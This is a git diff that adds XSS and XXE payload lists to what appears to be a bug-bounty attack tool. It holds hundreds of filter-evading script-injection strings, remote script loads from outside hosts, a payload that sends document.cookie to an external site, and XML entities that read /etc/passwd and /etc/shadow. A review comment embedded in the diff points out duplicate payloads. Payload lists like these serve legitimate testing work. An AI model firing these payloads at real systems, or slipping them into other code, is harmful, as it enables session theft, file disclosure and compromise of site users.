SRC=";javascript:alert(';XSS';);";>; +<;BODY BACKGROUND=";javascript:alert(';XSS';);";>; +<;BODY ONLOAD=alert(';XSS';)>; +<;DIV STYLE=";background-image: url(javascript:alert(';XSS';))";>; +<;DIV STYLE=";background-image: url(&;#1;javascript:alert(';XSS';))";>; +<;DIV STYLE=";width: expression(alert(';XSS';));";>; +<;FRAMESET>;<;FRAME SRC=";javascript:alert(';XSS';);";>;<;/FRAMESET>; +<;IFRAME SRC=";javascript:alert(';XSS';);";>;<;/IFRAME>; +<;INPUT TYPE=";IMAGE"; SRC=";javascript:alert(';XSS';);";>; +<;IMG SRC=";javascript:alert(';XSS';);";>; +<;IMG SRC=javascript:alert(';XSS';)>; +<;IMG 
DYNSRC=";javascript:alert(';XSS';);";>; +<;IMG LOWSRC=";javascript:alert(';XSS';);";>; +<;IMG SRC=";http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode";>; +Redirect 302 /a.jpg http://victimsite.com/admin.asp&;deleteuser +exp/*<;XSS STYLE=';no\xss:noxss(";*//*";); +<;STYLE>;li {list-style-image: url(";javascript:alert(&#39;XSS&#39;)";);}<;/STYLE>;<;UL>;<;LI>;XSS +<;IMG SRC=';vbscript:msgbox(";XSS";)';>; +<;LAYER SRC=";http://ha.ckers.org/scriptlet.html";>;<;/LAYER>; +<;IMG SRC=";livescript:[code]";>; +%BCscript%BEalert(%A2XSS%A2)%BC/script%BE +<;META HTTP-EQUIV=";refresh"; CONTENT=";0;url=javascript:alert(';XSS';);";>; +<;META HTTP-EQUIV=";refresh"; CONTENT=";0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K";>; +<;META HTTP-EQUIV=";refresh"; CONTENT=";0; URL=http://;URL=javascript:alert(';XSS';);";>; +<;IMG SRC=";mocha:[code]";>; +<;OBJECT TYPE=";text/x-scriptlet"; DATA=";http://ha.ckers.org/scriptlet.html";>;<;/OBJECT>; +<;OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389>;<;param name=url value=javascript:alert(';XSS';)>;<;/OBJECT>; +<;EMBED SRC=";http://ha.ckers.org/xss.swf"; AllowScriptAccess=";always";>;<;/EMBED>; +a=";get";;&;#10;b=";URL(";";;&;#10;c=";javascript:";;&;#10;d=";alert(';XSS';);";)";;&#10;eval(a+b+c+d); +<;STYLE TYPE=";text/javascript";>;alert(';XSS';);<;/STYLE>; +<;IMG STYLE=";xss:expr/*XSS*/ession(alert(';XSS';))";>; +<;XSS STYLE=";xss:expression(alert(';XSS';))";>; +<;STYLE>;.XSS{background-image:url(";javascript:alert(';XSS';)";);}<;/STYLE>;<;A CLASS=XSS>;<;/A>; +<;STYLE type=";text/css";>;BODY{background:url(";javascript:alert(';XSS';)";)}<;/STYLE>; +<;LINK REL=";stylesheet"; HREF=";javascript:alert(';XSS';);";>; +<;LINK REL=";stylesheet"; HREF=";http://ha.ckers.org/xss.css";>; +<;STYLE>;@import';http://ha.ckers.org/xss.css';;<;/STYLE>; +<;META HTTP-EQUIV=";Link"; Content=";<;http://ha.ckers.org/xss.css>;; REL=stylesheet";>; 
+<;STYLE>;BODY{-moz-binding:url(";http://ha.ckers.org/xssmoz.xml#xss";)}<;/STYLE>; +<;TABLE BACKGROUND=";javascript:alert(';XSS';)";>;<;/TABLE>; +<;TABLE>;<;TD BACKGROUND=";javascript:alert(';XSS';)";>;<;/TD>;<;/TABLE>; +<;HTML xmlns:xss>; +<;XML ID=I>;<;X>;<;C>;<;![CDATA[<;IMG SRC=";javas]]>;<;![CDATA[cript:alert(';XSS';);";>;]]>; +<;XML ID=";xss";>;<;I>;<;B>;<;IMG SRC=";javas<;!-- -->;cript:alert(';XSS';)";>;<;/B>;<;/I>;<;/XML>; +<;XML SRC=";http://ha.ckers.org/xsstest.xml"; ID=I>;<;/XML>; +<;HTML>;<;BODY>; +<;!--[if gte IE 4]>; +<;META HTTP-EQUIV=";Set-Cookie"; Content=";USERID=<;SCRIPT>;alert(';XSS';)<;/SCRIPT>;";>; +<;XSS STYLE=";behavior: url(http://ha.ckers.org/xss.htc);";>; +<;SCRIPT SRC=";http://ha.ckers.org/xss.jpg";>;<;/SCRIPT>; +<;!--#exec cmd=";/bin/echo ';<;SCRIPT SRC';";-->;<;!--#exec cmd=";/bin/echo ';=http://ha.ckers.org/xss.js>;<;/SCRIPT>;';";-->; +<;? echo(';<;SCR)';; +<;BR SIZE=";&;{alert(';XSS';)}";>; +<;IMG SRC=JaVaScRiPt:alert(';XSS';)>; +<;IMG SRC=javascript:alert(&;quot;XSS&;quot;)>; +<;IMG SRC=`javascript:alert(";RSnake says, ';XSS';";)`>; +<;IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>; +<;IMG RC=&;#106;&;#97;&;#118;&;#97;&;#115;&;#99;&;#114;&;#105;&;#112;&;#116;&;#58;&;#97;&;#108;&;#101;&;#114;&;#116;&;#40;&;#39;&;#88;&;#83;&;#83;&;#39;&;#41;>; +<;IMG RC=&;#0000106&;#0000097&;#0000118&;#0000097&;#0000115&;#0000099&;#0000114&;#0000105&;#0000112&;#0000116&;#0000058&;#0000097&;#0000108&;#0000101&;#0000114&;#0000116&;#0000040&;#0000039&;#0000088&;#0000083&;#0000083&;#0000039&;#0000041>; +<;DIV STYLE=";background-image:\0075\0072\006C\0028';\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.10530053\0027\0029';\0029";>; +<;IMG SRC=&;#x6A&;#x61&;#x76&;#x61&;#x73&;#x63&;#x72&;#x69&;#x70&;#x74&;#x3A&;#x61&;#x6C&;#x65&;#x72&;#x74&;#x28&;#x27&;#x58&;#x53&;#x53&;#x27&;#x29>; +<;HEAD>;<;META HTTP-EQUIV=";CONTENT-TYPE"; CONTENT=";text/html; charset=UTF-7";>; 
<;/HEAD>;+ADw-SCRIPT+AD4-alert(';XSS';);+ADw-/SCRIPT+AD4- +\";;alert(';XSS';);// +<;/TITLE>;<;SCRIPT>;alert("XSS");<;/SCRIPT>; +<;STYLE>;@im\port';\ja\vasc\ript:alert(";XSS";)';;<;/STYLE>; +<;IMG SRC=";jav&#x09;ascript:alert(';XSS';);";>; +<;IMG SRC=";jav&;#x09;ascript:alert(';XSS';);";>; +<;IMG SRC=";jav&;#x0A;ascript:alert(';XSS';);";>; +<;IMG SRC=";jav&;#x0D;ascript:alert(';XSS';);";>; +<;IMG&#x0D;SRC&#x0D;=&#x0D;";&#x0D;j&#x0D;a&#x0D;v&#x0D;a&#x0D;s&#x0D;c&#x0D;r&#x0D;i&#x0D;p&#x0D;t&#x0D;:&#x0D;a&#x0D;l&#x0D;e&#x0D;r&#x0D;t&#x0D;&#x0D;';&#x0D;X&#x0D;S&#x0D;S&#x0D;';&#x0D;)&#x0D;";&#x0D;>;&#x0D; +perl -e ';print ";<;IM SRC=java\0script:alert(";XSS";)>";;';>; out +perl -e ';print ";&;<;SCR\0IPT>;alert(";XSS";)<;/SCR\0IPT>;";;'; >; out +<;IMG SRC="; &;#14; javascript:alert(';XSS';);";>; +<;SCRIPT/XSS SRC=";http://ha.ckers.org/xss.js";>;<;/SCRIPT>; +<;BODY onload!#$%&;()*~+-_.,:;?@[/|\]^`=alert(";XSS";)>; +<;SCRIPT SRC=http://ha.ckers.org/xss.js +<;SCRIPT SRC=//ha.ckers.org/.j>; +<;IMG SRC=";javascript:alert(';XSS';)"; +<;IFRAME SRC=http://ha.ckers.org/scriptlet.html <; +<;<;SCRIPT>;alert(";XSS";);//<;<;/SCRIPT>; +<;IMG ";";";>;<;SCRIPT>;alert(";XSS";)<;/SCRIPT>;";>; +<;SCRIPT>;a=/XSS/ +<;SCRIPT a=";>;"; SRC=";http://ha.ckers.org/xss.js";>;<;/SCRIPT>; +<;SCRIPT =";blah"; SRC=";http://ha.ckers.org/xss.js";>;<;/SCRIPT>; +<;SCRIPT a=";blah"; ';'; SRC=";http://ha.ckers.org/xss.js";>;<;/SCRIPT>; +<;SCRIPT ";a=';>;';"; SRC=";http://ha.ckers.org/xss.js";>;<;/SCRIPT>; +<;SCRIPT a=`>;` SRC=";http://ha.ckers.org/xss.js";>;<;/SCRIPT>; +<;SCRIPT>;document.write(";<;SCRI";);<;/SCRIPT>;PT SRC=";http://ha.ckers.org/xss.js";>;<;/SCRIPT>; +<;SCRIPT a=";>';>"; SRC=";http://ha.ckers.org/xss.js";>;<;/SCRIPT>; +<;A HREF=";http://66.102.7.147/";>;XSS<;/A>; +<;A HREF=";http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D";>;XSS<;/A>; +<;A HREF=";http://1113982867/";>;XSS<;/A>; +<;A HREF=";http://0x42.0x0000066.0x7.0x93/";>;XSS<;/A>; +<;A HREF=";http://0102.0146.0007.00000223/";>;XSS<;/A>; 
+<;A HREF=";h&#x0A;tt&#09;p://6&;#09;6.000146.0x7.147/";>;XSS<;/A>; +<;A HREF=";//www.google.com/";>;XSS<;/A>; +<;A HREF=";//google";>;XSS<;/A>; +<;A HREF=";http://ha.ckers.org@google";>;XSS<;/A>; +<;A HREF=";http://google:ha.ckers.org";>;XSS<;/A>; +<;A HREF=";http://google.com/";>;XSS<;/A>; +<;A HREF=";http://www.google.com./";>;XSS<;/A>; +<;A HREF=";javascript:document.location=';http://www.google.com/';";>;XSS<;/A>; +<;A HREF=";http://www.gohttp://www.google.com/ogle.com/";>;XSS<;/A>; +<script>document.vulnerable=true;</script> +<img SRC="jav ascript:document.vulnerable=true;"> +<img SRC="javascript:document.vulnerable=true;"> +<img SRC=" &#14; javascript:document.vulnerable=true;"> +<body onload!#$%&()*~+-_.,:;?@[/|\]^`=document.vulnerable=true;> +<<SCRIPT>document.vulnerable=true;//<</SCRIPT> +<script <B>document.vulnerable=true;</script> +<img SRC="javascript:document.vulnerable=true;" +<iframe src="javascript:document.vulnerable=true; < +<script>a=/XSS/\ndocument.vulnerable=true;</script> +\";document.vulnerable=true;;// +</title><SCRIPT>document.vulnerable=true;</script> +<input TYPE="IMAGE" SRC="javascript:document.vulnerable=true;"> +<body BACKGROUND="javascript:document.vulnerable=true;"> +<body ONLOAD=document.vulnerable=true;> +<img DYNSRC="javascript:document.vulnerable=true;"> +<img LOWSRC="javascript:document.vulnerable=true;"> +<bgsound SRC="javascript:document.vulnerable=true;"> +<br SIZE="&{document.vulnerable=true}"> +<LAYER SRC="javascript:document.vulnerable=true;"></LAYER> +<link REL="stylesheet" HREF="javascript:document.vulnerable=true;"> +<style>li {list-style-image: url("javascript:document.vulnerable=true;");</STYLE><UL><LI>XSS +<img SRC='vbscript:document.vulnerable=true;'> +1script3document.vulnerable=true;1/script3 +<meta HTTP-EQUIV="refresh" CONTENT="0;url=javascript:document.vulnerable=true;"> +<meta HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:document.vulnerable=true;"> +<IFRAME 
SRC="javascript:document.vulnerable=true;"></iframe> +<FRAMESET><FRAME SRC="javascript:document.vulnerable=true;"></frameset> +<table BACKGROUND="javascript:document.vulnerable=true;"> +<table><TD BACKGROUND="javascript:document.vulnerable=true;"> +<div STYLE="background-image: url(javascript:document.vulnerable=true;)"> +<div STYLE="background-image: url(&#1;javascript:document.vulnerable=true;)"> +<div STYLE="width: expression(document.vulnerable=true);"> +<style>@im\port'\ja\vasc\ript:document.vulnerable=true';</style> +<img STYLE="xss:expr/*XSS*/ession(document.vulnerable=true)"> +<XSS STYLE="xss:expression(document.vulnerable=true)"> +exp/*<A STYLE='no\xss:noxss("*//*");xss:ex/*XSS*//*/*/pression(document.vulnerable=true)'> +<style TYPE="text/javascript">document.vulnerable=true;</style> +<style>.XSS{background-image:url("javascript:document.vulnerable=true");}</STYLE><A CLASS=XSS></a> +<style type="text/css">BODY{background:url("javascript:document.vulnerable=true")}</style> +<!--[if gte IE 4]><SCRIPT>document.vulnerable=true;</SCRIPT><![endif]--> +<base HREF="javascript:document.vulnerable=true;//"> +<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:document.vulnerable=true></object> +<XML ID=I><X><C><![<IMG SRC="javas]]<![cript:document.vulnerable=true;">]]</C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></span> +<XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:document.vulnerable=true"></B></I></XML><SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></span> +<html><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="XSS<SCRIPT DEFER>document.vulnerable=true</SCRIPT>"></BODY></html> +<? 
echo('<SCR)';echo('IPT>document.vulnerable=true</SCRIPT>'); ?> +<meta HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>document.vulnerable=true</SCRIPT>"> +<head><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-document.vulnerable=true;+ADw-/SCRIPT+AD4- +<a href="javascript#document.vulnerable=true;"> +<div onmouseover="document.vulnerable=true;"> +<img src="javascript:document.vulnerable=true;"> +<img dynsrc="javascript:document.vulnerable=true;"> +<input type="image" dynsrc="javascript:document.vulnerable=true;"> +<bgsound src="javascript:document.vulnerable=true;"> +&<script>document.vulnerable=true;</script> +&{document.vulnerable=true;}; +<img src=&{document.vulnerable=true;};> +<link rel="stylesheet" href="javascript:document.vulnerable=true;"> +<iframe src="vbscript:document.vulnerable=true;"> +<img src="mocha:document.vulnerable=true;"> +<img src="livescript:document.vulnerable=true;"> +<a href="about:<script>document.vulnerable=true;</script>"> +<meta http-equiv="refresh" content="0;url=javascript:document.vulnerable=true;"> +<body onload="document.vulnerable=true;"> +<div style="background-image: url(javascript:document.vulnerable=true;);"> +<div style="behaviour: url([link to code]);"> +<div style="binding: url([link to code]);"> +<div style="width: expression(document.vulnerable=true;);"> +<style type="text/javascript">document.vulnerable=true;</style> +<object classid="clsid:..." 
codebase="javascript:document.vulnerable=true;"> +<style><!--</style><script>document.vulnerable=true;//--></script> +<<script>document.vulnerable=true;</script> +<![<!--]]<script>document.vulnerable=true;//--></script> +<!-- -- --><script>document.vulnerable=true;</script><!-- -- --> +<img src="blah"onmouseover="document.vulnerable=true;"> +<img src="blah>" onmouseover="document.vulnerable=true;"> +<xml src="javascript:document.vulnerable=true;"> +<xml id="X"><a><b><script>document.vulnerable=true;</script>;</b></a></xml> +<div datafld="b" dataformatas="html" datasrc="#X"></div> +[\xC0][\xBC]script>document.vulnerable=true;[\xC0][\xBC]/script> +<style>@import'http://www.securitycompass.com/xss.css';</style> +<meta HTTP-EQUIV="Link" Content="<http://www.securitycompass.com/xss.css>; REL=stylesheet"> +<style>BODY{-moz-binding:url("http://www.securitycompass.com/xssmoz.xml#xss")}</style> +<OBJECT TYPE="text/x-scriptlet" DATA="http://www.securitycompass.com/scriptlet.html"></object> +<HTML xmlns:xss><?import namespace="xss" implementation="http://www.securitycompass.com/xss.htc"><xss:xss>XSS</xss:xss></html> +<script SRC="http://www.securitycompass.com/xss.jpg"></script> +<!--#exec cmd="/bin/echo '<SCR'"--><!--#exec cmd="/bin/echo 'IPT SRC=http://www.securitycompass.com/xss.js></SCRIPT>'"--> +<script a=">" SRC="http://www.securitycompass.com/xss.js"></script> +<script =">" SRC="http://www.securitycompass.com/xss.js"></script> +<script a=">" '' SRC="http://www.securitycompass.com/xss.js"></script> +<script "a='>'" SRC="http://www.securitycompass.com/xss.js"></script> +<script a=`>` SRC="http://www.securitycompass.com/xss.js"></script> +<script a=">'>" SRC="http://www.securitycompass.com/xss.js"></script> +<script>document.write("<SCRI");</SCRIPT>PT SRC="http://www.securitycompass.com/xss.js"></script> +<div style="binding: url(http://www.securitycompass.com/xss.js);"> [Mozilla] +";>;<;BODY onload!#$%&;()*~+-_.,:;?@[/|\]^`=alert(";XSS";)>; 
+<;/script>;<;script>;alert(1)<;/script>; +<;/br style=a:expression(alert())>; +<;scrscriptipt>;alert(1)<;/scrscriptipt>; +<;br size=\";&;{alert(&#039;XSS&#039;)}\";>; +perl -e &#039;print \";<;IMG SRC=java\0script:alert(\";XSS\";)>;\";;&#039; >; out +perl -e &#039;print \";<;SCR\0IPT>;alert(\";XSS\";)<;/SCR\0IPT>;\";;&#039; >; out +<~/XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))> +<~/XSS/*-*/STYLE=xss:e/**/xpression(window.location="http://www.procheckup.com/?sid="%2bdocument.cookie)> +<~/XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))> +<~/XSS STYLE=xss:expression(alert('XSS'))> +"><script>alert('XSS')</script> +</XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))> +XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))> +XSS STYLE=xss:e/**/xpression(alert('XSS'))> +</XSS STYLE=xss:expression(alert('XSS'))> +>"><script>alert("XSS")</script>& +"><STYLE>@import"javascript:alert('XSS')";</STYLE> +>"'><img%20src%3D%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x3a;alert(%26quot;%26%23x20;XSS%26%23x20;Test%26%23x20;Successful%26quot;)> +>%22%27><img%20src%3d%22javascript:alert(%27%20XSS%27)%22> +'%uff1cscript%uff1ealert('XSS')%uff1c/script%uff1e' +'';!--"<XSS>=&{()} +<IMG SRC="javascript:alert('XSS');"> +<IMG SRC=javascript:alert('XSS')> +<IMG SRC=JaVaScRiPt:alert('XSS')> +<IMG SRC=JaVaScRiPt:alert(&quot;XSS<WBR>&quot;)> +<IMGSRC=&#106;&#97;&#118;&#97;&<WBR>#115;&#99;&#114;&#105;&#112;&<WBR>#116;&#58;&#97;&#108;&#101;&<WBR>#114;&#116;&#40;&#39;&#88;&#83<WBR>;&#83;&#39;&#41> +<IMGSRC=&#0000106&#0000097&<WBR>#0000118&#0000097&#0000115&<WBR>#0000099&#0000114&#0000105&<WBR>#0000112&#0000116&#0000058&<WBR>#0000097&#0000108&#0000101&<WBR>#0000114&#0000116&#0000040&<WBR>#0000039&#0000088&#0000083&<WBR>#0000083&#0000039&#0000041> +<IMGSRC=&#x6A&#x61&#x76&#x61&#x73&<WBR>#x63&#x72&#x69&#x70&#x74&#x3A&<WBR>#x61&#x6C&#x65&#x72&#x74&#x28&<WBR>#x27&#x58&#x53&#x53&#x27&#x29> +<IMG SRC="jav&#x0A;ascript:alert(<WBR>'XSS');"> +<IMG 
SRC="jav&#x0D;ascript:alert(<WBR>'XSS');"> +<![CDATA[<script>var n=0;while(true){n++;}</script>]]> +<?xml version="1.0" encoding="ISO-8859-1"?><foo><![CDATA[<]]>SCRIPT<![CDATA[>]]>alert('gotcha');<![CDATA[<]]>/SCRIPT<![CDATA[>]]></foo> +<?xml version="1.0" encoding="ISO-8859-1"?><foo><![CDATA[' or 1=1 or ''=']]></foof> +<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file://c:/boot.ini">]><foo>&xee;</foo> +<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:///etc/passwd">]><foo>&xee;</foo> +<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:///etc/shadow">]><foo>&xee;</foo> +<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:///dev/random">]><foo>&xee;</foo> +<script>alert('XSS')</script> +%3cscript%3ealert('XSS')%3c/script%3e +%22%3e%3cscript%3ealert('XSS')%3c/script%3e +<IMG SRC="javascript:alert('XSS');"> +<IMG SRC=javascript:alert(&quot;XSS&quot;)> +<IMG SRC=javascript:alert('XSS')> +<img src=xss onerror=alert(1)> +<IMG """><SCRIPT>alert("XSS")</SCRIPT>"> +<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))> +<IMG SRC="jav ascript:alert('XSS');"> +<IMG SRC="jav&#x09;ascript:alert('XSS');"> +<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;> +<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041> +<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29> +<BODY BACKGROUND="javascript:alert('XSS')"> +<BODY ONLOAD=alert('XSS')> +<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');"> +<IMG SRC="javascript:alert('XSS')" +<iframe 
src=http://ha.ckers.org/scriptlet.html < +<<SCRIPT>alert("XSS");//<</SCRIPT> +%253cscript%253ealert(1)%253c/script%253e +"><s"%2b"cript>alert(document.cookie)</script> +foo<script>alert(1)</script> +<scr<script>ipt>alert(1)</scr</script>ipt> +<SCRIPT>String.fromCharCode(97, 108, 101, 114, 116, 40, 49, 41)</SCRIPT> +';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> +<marquee onstart='javascript:alert('1');'>=(◕_◕)= \ No newline at end of file diff --git a/bounty_drive/attacks/xss/payloads/XSS-Polyglot-Ultimate-0xsobky.txt b/bounty_drive/attacks/xss/payloads/XSS-Polyglot-Ultimate-0xsobky.txt new file mode 100644 index 0000000..907cb73 --- /dev/null +++ b/bounty_drive/attacks/xss/payloads/XSS-Polyglot-Ultimate-0xsobky.txt @@ -0,0 +1 @@ +jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e diff --git a/bounty_drive/attacks/xss/payloads/XSS-Polyglots-Dmiessler.txt b/bounty_drive/attacks/xss/payloads/XSS-Polyglots-Dmiessler.txt new file mode 100644 index 0000000..1c0378e --- /dev/null +++ b/bounty_drive/attacks/xss/payloads/XSS-Polyglots-Dmiessler.txt 
@@ -0,0 +1,11 @@
+javascript://'/</title></style></textarea></script>--><p" onclick=alert()//>*/alert()/*
+javascript://--></script></title></style>"/</textarea>*/<alert()/*' onclick=alert()//>a
+javascript://</title>"/</script></style></textarea/-->*/<alert()/*' onclick=alert()//>/
+javascript://</title></style></textarea>--></script><a"//' onclick=alert()//>*/alert()/*
+javascript://'//" --></textarea></style></script></title><b onclick= alert()//>*/alert()/*
+javascript://</title></textarea></style></script --><li '//" '*/alert()/*', onclick=alert()//
+javascript:alert()//--></script></textarea></style></title><a"//' onclick=alert()//>*/alert()/*
+--></script></title></style>"/</textarea><a' onclick=alert()//>*/alert()/*
+/</title/'/</style/</script/</textarea/--><p" onclick=alert()//>*/alert()/*
+javascript://--></title></style></textarea></script><svg "//' onclick=alert()//
+/</title/'/</style/</script/--><p" onclick=alert()//>*/alert()/*
diff --git a/bounty_drive/attacks/xss/payloads/XSS-Polyglots.txt b/bounty_drive/attacks/xss/payloads/XSS-Polyglots.txt
new file mode 100644
index 0000000..21d6f97
--- /dev/null
+++ b/bounty_drive/attacks/xss/payloads/XSS-Polyglots.txt
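Review bot: The eleven entries added in XSS-Polyglots-Dmiessler.txt are repeated verbatim as lines 4–14 of XSS-Polyglots.txt in the next hunk, so a run that loads both files sends each of them to the target twice. That doubles request volume against an in-scope host for no extra coverage and makes rate-limit and WAF-block handling harder to reason about. Keep the entries in one file only, or, if the loader (not visible in this diff) merges the lists, de-duplicate there while preserving order, e.g. `payloads = list(dict.fromkeys(payloads))`.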
@@ -0,0 +1,14 @@
+';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
+“ onclick=alert(1)//<button ‘ onclick=alert(1)//> */ alert(1)//
+'">><marquee><img src=x onerror=confirm(1)></marquee>"></plaintext\></|\><plaintext/onmouseover=prompt(1)><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>'-->"></script><script>alert(1)</script>"><img/id="confirm&lpar;1)"/alt="/"src="/"onerror=eval(id&%23x29;>'"><img src="http://i.imgur.com/P8mL8.jpg">
+javascript://'/</title></style></textarea></script>--><p" onclick=alert()//>*/alert()/*
+javascript://--></script></title></style>"/</textarea>*/<alert()/*' onclick=alert()//>a
+javascript://</title>"/</script></style></textarea/-->*/<alert()/*' onclick=alert()//>/
+javascript://</title></style></textarea>--></script><a"//' onclick=alert()//>*/alert()/*
+javascript://'//" --></textarea></style></script></title><b onclick= alert()//>*/alert()/*
+javascript://</title></textarea></style></script --><li '//" '*/alert()/*', onclick=alert()//
+javascript:alert()//--></script></textarea></style></title><a"//' onclick=alert()//>*/alert()/*
+--></script></title></style>"/</textarea><a' onclick=alert()//>*/alert()/*
+/</title/'/</style/</script/</textarea/--><p" onclick=alert()//>*/alert()/*
+javascript://--></title></style></textarea></script><svg "//' onclick=alert()//
+/</title/'/</style/</script/--><p" onclick=alert()//>*/alert()/*
diff --git a/bounty_drive/attacks/xss/payloads/XSS-RSNAKE.txt b/bounty_drive/attacks/xss/payloads/XSS-RSNAKE.txt
new file mode 100644
index 0000000..745e370
--- /dev/null
+++ b/bounty_drive/attacks/xss/payloads/XSS-RSNAKE.txt
@@ -0,0 +1,73 @@ +<SCRIPT>alert('XSS');</SCRIPT> +'';!--"<XSS>=&{()} +<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT> +<IMG SRC="javascript:alert('XSS');"> +<IMG SRC=javascript:alert('XSS')> +<IMG SRC=JaVaScRiPt:alert('XSS')> +<IMG SRC=javascript:alert(&quot;XSS&quot;)> +<IMG SRC=`javascript:alert("RSnake says, 'XSS'")`> +<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))> +SRC=&#10<IMG 6;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;> +<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041> +<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29> +<IMG SRC="jav ascript:alert('XSS');"> +<IMG SRC="jav&#x09;ascript:alert('XSS');"> +<IMG SRC="jav&#x0A;ascript:alert('XSS');"> +<IMG SRC="jav&#x0D;ascript:alert('XSS');"> +<IMG SRC=" &#14; javascript:alert('XSS');"> +<SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT> +<SCRIPT SRC=http://ha.ckers.org/xss.js?<B> +<IMG SRC="javascript:alert('XSS')" +<SCRIPT>a=/XSS/ +\";alert('XSS');// +<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');"> +<BODY BACKGROUND="javascript:alert('XSS')"> +<BODY ONLOAD=alert('XSS')> +<IMG DYNSRC="javascript:alert('XSS')"> +<IMG LOWSRC="javascript:alert('XSS')"> +<BGSOUND SRC="javascript:alert('XSS');"> +<BR SIZE="&{alert('XSS')}"> +<LAYER SRC="http://ha.ckers.org/scriptlet.html"></LAYER> +<LINK REL="stylesheet" HREF="javascript:alert('XSS');"> +<LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css"> +<STYLE>@import'http://ha.ckers.org/xss.css';</STYLE> +<META HTTP-EQUIV="Link" Content="<http://ha.ckers.org/xss.css>; REL=stylesheet"> +<STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE> +<IMG SRC='vbscript:msgbox("XSS")'> +<IMG SRC="mocha:[code]"> +<IMG 
SRC="livescript:[code]"> +<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');"> +<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K"> +<META HTTP-EQUIV="Link" Content="<javascript:alert('XSS')>; REL=stylesheet"> +<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');"> +<IFRAME SRC="javascript:alert('XSS');"></IFRAME> +<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET> +<TABLE BACKGROUND="javascript:alert('XSS')"> +<DIV STYLE="background-image: url(javascript:alert('XSS'))"> +<DIV STYLE="background-image: url(&#1;javascript:alert('XSS'))"> +<DIV STYLE="width: expression(alert('XSS'));"> +<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE> +<IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))"> +<XSS STYLE="xss:expression(alert('XSS'))"> +exp/*<XSS STYLE='no\xss:noxss("*//*"); +<STYLE 